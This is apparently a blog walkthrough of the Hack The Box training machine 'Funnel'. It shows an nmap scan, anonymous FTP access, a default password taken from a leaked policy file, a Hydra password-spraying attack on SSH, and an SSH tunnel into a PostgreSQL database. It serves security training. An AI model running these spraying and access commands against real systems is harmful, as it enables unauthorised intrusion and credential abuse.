The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Funnel: Use local port forwarding to access the PostgreSQL DB

posted on 2.6.2023 by Below Surface in "Hack The Box"

Port scan (exchange ip with your machines IP address):

sudo nmap -sV ip

Relevant output:

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let's try to login via FTP with the default credentials (Username: anonymous, hit enter for password).

ftp ip
hit enter

Success! Let's see what we got:



229 Entering Extended Passive Mode (|||27324|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
226 Directory send OK.

Lets check what's inside of the mail_backup directory

cd mail_backup


229 Entering Extended Passive Mode (|||18542|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp         58899 Nov 28  2022 password_policy.pdf
-rw-r--r--    1 ftp      ftp           713 Nov 28  2022 welcome_28112022
226 Directory send OK.

Let's download these two files and close the FTP connection:

get password_policy.pdf
get welcome_28112022

First we view the contents of the welcome file:

cat welcome_28112022

Relevant output (email addresses):

Frome: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb

Now, the password file. Since using cat for PDF files is not a working solution, we open the directory and open the file by double clicking on it!

open .

Relevant file information:

For example the default password of “funnel123#!#” must be changed immediately.

Since we got a couple of email addresses and a default password now, we can check if someone did not change it. The server also has port 22 (SSH) open, so we will try the usernames with the password funnel123#!# in a password spraying attack with the tool Hydra.

Let's create a list of usernames first:

cd temp
sudo nano usernames.txt

Paste the usernames, each in a new line. Then hit ctrl + o and enter so save, and then ctrl + x to close the text editor. Check if your file outputs this:

cat usernames.txt      

Then, use Hydra to try all username/password combinations via SSH:

hydra -L usernames.txt -p 'funnel123#!#' ip ssh

Relevant output:

[22][ssh] host:   login: christine   password: funnel123#!#

We got a working username for the default password! Let's SSH into the machine with these credentials.

ssh christine@ip
type: yes
password: funnel123#!#

Yeah, we got in! Let's see some more info about this account:


Relevant output:

uid=1000(christine) gid=1000(christine) groups=1000(christine)

Let's explore this server. With the "ss" command (socket statistics) we can see which ports are open locally. Flag -l (listening sockets) and Flag -t (TCP sockets) are appended.

ss -tl


State     Recv-Q    Send-Q         Local Address:Port               Peer Address:Port    Process    
LISTEN    0         4096              *                  
LISTEN    0         4096         *                  
LISTEN    0         128                   *                  
LISTEN    0         4096         *                  
LISTEN    0         32                         *:ftp                           *:*                  
LISTEN    0         128                     [::]:ssh                        [::]:*                 

The port of our interest is the port of the PostgreSQL database. We can append the flag -n to our command to see the port number:

ss -tln


State      Recv-Q     Send-Q         Local Address:Port           Peer Address:Port     Process     
LISTEN     0          4096          *                    
LISTEN     0          4096         *                    
LISTEN     0          128                *                    
LISTEN     0          4096           *                    
LISTEN     0          32                         *:21                        *:*                    
LISTEN     0          128                     [::]:22                     [::]:*                   

The port of the PostgreSQL database is 5432. With the command line tool psql, we can interact with it. But running the command:



Command 'psql' not found, but can be installed with:
apt install postgresql-client-common
Please ask your administrator.

Since we don't have admin privileges on this server, we will instead try to bypass this issue by local port-forwarding/tunneling via SSH. Close the SSH connection and reconnect with:

ssh -L 1234:localhost:5432 christine@ip
password: funnel123#!#

We are logged in, as we were before. But when running :

ss -tlpn

We can see in the output, that we have now opened up a socket on our local machine on port 1234, to which we can direct traffic, that we want to be forwarded to port 5432 on the server.

LISTEN  0       128 *      users:(("ssh",pid=1855,fd=5))
LISTEN  0       128              [::1]:1234              [::]:*      users:(("ssh",pid=1855,fd=4))

Now on our local machine, we can run this command to interact with the PostgreSQL service on the target machine.

psql -U christine -h localhost -p 1234
password: funnel123#!#

And it worked!

psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))

Let's see the database content:



Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
(5 rows)

What's inside secrets?

\q // close the overview
\c secrets


psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".

Let's view the tables:

        List of relations
 Schema | Name | Type |  Owner  
 public | flag | table | christine
(1 row)

Let's view the content of flag:




hack the box
local port forwarding
password spraying


More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box